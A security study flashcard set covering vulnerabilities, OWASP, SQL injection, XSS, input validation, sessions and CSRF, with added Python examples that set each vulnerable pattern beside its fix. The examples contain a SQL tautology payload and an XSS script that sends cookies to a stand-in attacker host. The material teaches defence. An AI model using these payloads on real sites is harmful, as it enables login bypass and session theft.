csf Flashcards
(17 cards)
What are the two categories of software?
- Application Software (e.g., MS Office)
- System Software (e.g., MS Windows)
Application software is designed for end-users, while system software manages and controls hardware components.
What defines software vulnerabilities?
- Existence of a flaw in the software
- Possibility of the attacker gaining access to the flaw
- Ability of the attacker to exploit that flaw
Vulnerabilities can allow hackers or malware to exploit software for malicious purposes.
What is the purpose of software patching?
To ensure that all systems have up-to-date patches to prevent exploitation of known vulnerabilities
Regular patching is a crucial security practice to maintain software integrity.
What principle does Access Management enforce?
The principle of Least Privilege
Each user, process or service is granted only the privileges needed for its job function, which reduces the attack surface and limits the damage a compromised account can do.
What is a web application?
Application software that runs on a web server and is accessed through a web browser
Web applications differ from traditional software as they rely on network connectivity.
What is the Open Web Application Security Project (OWASP) Foundation?
A non-profit organization aimed at spreading awareness of software security globally
OWASP provides resources like the OWASP Top 10 list of critical security risks.
What is the OWASP Top 10?
A list of the most common and critical security risks seen in web applications
Each risk is ranked based on various factors like exploitability and impact.
What is SQL Injection?
A vulnerability in which untrusted input is concatenated into an SQL query, letting an attacker alter the query to read, modify or delete data or to bypass authentication
It occurs when user input is placed directly into the query text instead of being passed as a bound parameter; parameterized queries (prepared statements) are the primary defence, with input validation as a second layer.
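The following is an added example (not code from the flashcard set or its source) that shows the vulnerable pattern and its fix side by side. It uses an in-memory SQLite database with a constructed users table; the table, the rows and the plaintext passwords are assumptions for the demonstration only (a real application stores password hashes).

```python
import sqlite3


def make_db():
    """Build a constructed in-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted input is concatenated into the query text, so the attacker controls the SQL."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query).fetchall()]


def login_safe(conn, username, password):
    """Parameterized query: the input is bound as data and is never parsed as SQL."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"  # classic tautology injection
    # Vulnerable version: the WHERE clause becomes always-true, every user matches.
    print(login_vulnerable(db, payload, payload))
    # Safe version: the payload is compared literally as a username and no row matches.
    print(login_safe(db, payload, payload))
    print(login_safe(db, "alice", "s3cret"))
```

With the payload supplied as both username and password, the vulnerable query becomes `WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'`, which is true for every row; the parameterized version treats the same bytes as an ordinary string value.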
What does Cross-Site Scripting (XSS) target?
The users of the web application (their browsers), not the server itself
XSS injects attacker-supplied script into a page the victim's browser trusts, so the script runs with the legitimate site's origin and can read cookies or session data or act as the user. Output encoding of untrusted data is the main defence.
What is the purpose of input validation?
To check that input submitted by a user has the expected type, format, length and range before the application uses it
Allowlists (accept only known-good patterns) are preferred over denylists; validation reduces the attack surface but does not replace parameterized queries or output encoding.
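This added example (not part of the original flashcards) illustrates both the input validation card and the XSS card: an allowlist check on two field types, and the same reflected greeting rendered with and without output encoding. The field formats (username of 3 to 16 word characters, age 0 to 150) and the script payload are constructed assumptions.

```python
import html
import re

# Assumed allowlist policy: usernames are 3-16 letters, digits or underscores.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,16}")


def validate_username(value):
    """Allowlist validation: accept only strings matching the expected format."""
    return isinstance(value, str) and USERNAME_RE.fullmatch(value) is not None


def validate_age(value):
    """Type and range check: accept only decimal digit strings in 0..150."""
    if not isinstance(value, str) or not value.isdigit():
        return False
    return 0 <= int(value) <= 150


def render_greeting_vulnerable(display_name):
    """Reflects user input into HTML unencoded, so a script payload runs in the viewer's browser."""
    return "<p>Hello, " + display_name + "!</p>"


def render_greeting_safe(display_name):
    """Output encoding: HTML metacharacters become entities, so the browser shows text, not markup."""
    return "<p>Hello, " + html.escape(display_name, quote=True) + "!</p>"


if __name__ == "__main__":
    payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    print(validate_username(payload))           # False: rejected by the allowlist
    print(render_greeting_vulnerable(payload))  # <script> tag survives intact
    print(render_greeting_safe(payload))        # &lt;script&gt;... rendered as literal text
```

Validation and encoding are complementary: a field that legitimately allows `<` or `'` (a free-text display name, for example) will pass validation, and only encoding at output time keeps it from becoming markup.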
What are cookies?
- Small pieces of data that a web server sets (via the Set-Cookie header) and the browser stores and returns with later requests to that site
- Used to identify users (session identifiers) and store preferences
Cookies play a critical role in user sessions and personalization on websites; because the browser sends them automatically, a cookie alone cannot prove that the user intended a request.
How are sessions defined in web applications?
Server-side storage of information about the user's interaction with the web application, looked up by a session identifier the browser presents (usually in a cookie)
Sessions typically begin at login and end at logout or after a timeout; the session identifier must be unpredictable, since anyone who holds it is treated as that user.
What is Cross-Site Request Forgery (CSRF)?
An attack that tricks a user into executing unwanted actions on a web application where they are authenticated
CSRF exploits the user’s active session to perform unauthorized actions.
What is a technique to prevent CSRF (XSRF) attacks?
Include an unpredictable anti-CSRF token in every state-changing request and verify it server-side before acting
Tokens should be unique per user session and not readable from another origin; the attacker's page can cause the browser to send the victim's cookie, but cannot obtain the token.
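As an added example (not code from the flashcards), the following ties the session card and the CSRF card together: a hypothetical in-memory session store keyed by an unpredictable session id, a per-session anti-CSRF token, and a request handler that rejects a forged cross-site request carrying the cookie but not the token. The `handle_transfer` endpoint, its form fields and the dictionaries standing in for cookies and form data are assumptions for the demonstration.

```python
import hmac
import secrets

# Hypothetical server-side session store: session id (from the cookie) -> session data.
SESSIONS = {}


def create_session(username):
    """Start a session at login: unpredictable id for the cookie plus a per-session CSRF token."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"user": username, "csrf_token": secrets.token_urlsafe(32)}
    return session_id


def end_session(session_id):
    """Logout: drop the server-side state so the cookie value becomes useless."""
    SESSIONS.pop(session_id, None)


def csrf_token_for(session_id):
    """Token to embed in the form (or custom header) of every state-changing request."""
    return SESSIONS[session_id]["csrf_token"]


def handle_transfer(cookies, form):
    """State-changing endpoint; returns (HTTP status, message)."""
    session = SESSIONS.get(cookies.get("session_id"))
    if session is None:
        return 401, "not authenticated"
    submitted = form.get("csrf_token", "")
    # A cross-site form makes the browser attach the cookie, but the attacker cannot read
    # the token bound to this session, so a missing or wrong token marks the request as forged.
    # Constant-time comparison avoids leaking the token through timing differences.
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403, "invalid CSRF token"
    return 200, "transferred %s to %s for %s" % (form.get("amount"), form.get("to"), session["user"])


if __name__ == "__main__":
    sid = create_session("alice")
    legit = {"csrf_token": csrf_token_for(sid), "amount": "10", "to": "bob"}
    forged = {"amount": "1000", "to": "mallory"}  # attacker-controlled form: no token
    print(handle_transfer({"session_id": sid}, legit))   # (200, ...)
    print(handle_transfer({"session_id": sid}, forged))  # (403, ...)
    end_session(sid)
    print(handle_transfer({"session_id": sid}, legit))   # (401, ...)
```

The check is per session rather than per user so that a token leaked from an old session cannot be replayed against a new one; the `SameSite` cookie attribute is a useful complementary control but does not replace the token.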
What does CAPTCHA stand for?
Completely Automated Public Turing test to tell Computers and Humans Apart
CAPTCHA helps distinguish between human users and automated bots.
What is the impact of software vulnerabilities?
They can negatively affect the performance and security of software
Vulnerabilities can lead to data breaches and unauthorized access.
What is the recommended reading for SQL Injection attacks?
https://www.w3schools.com/sql/sql_injection.asp
This resource provides detailed information on SQL injection vulnerabilities and prevention methods.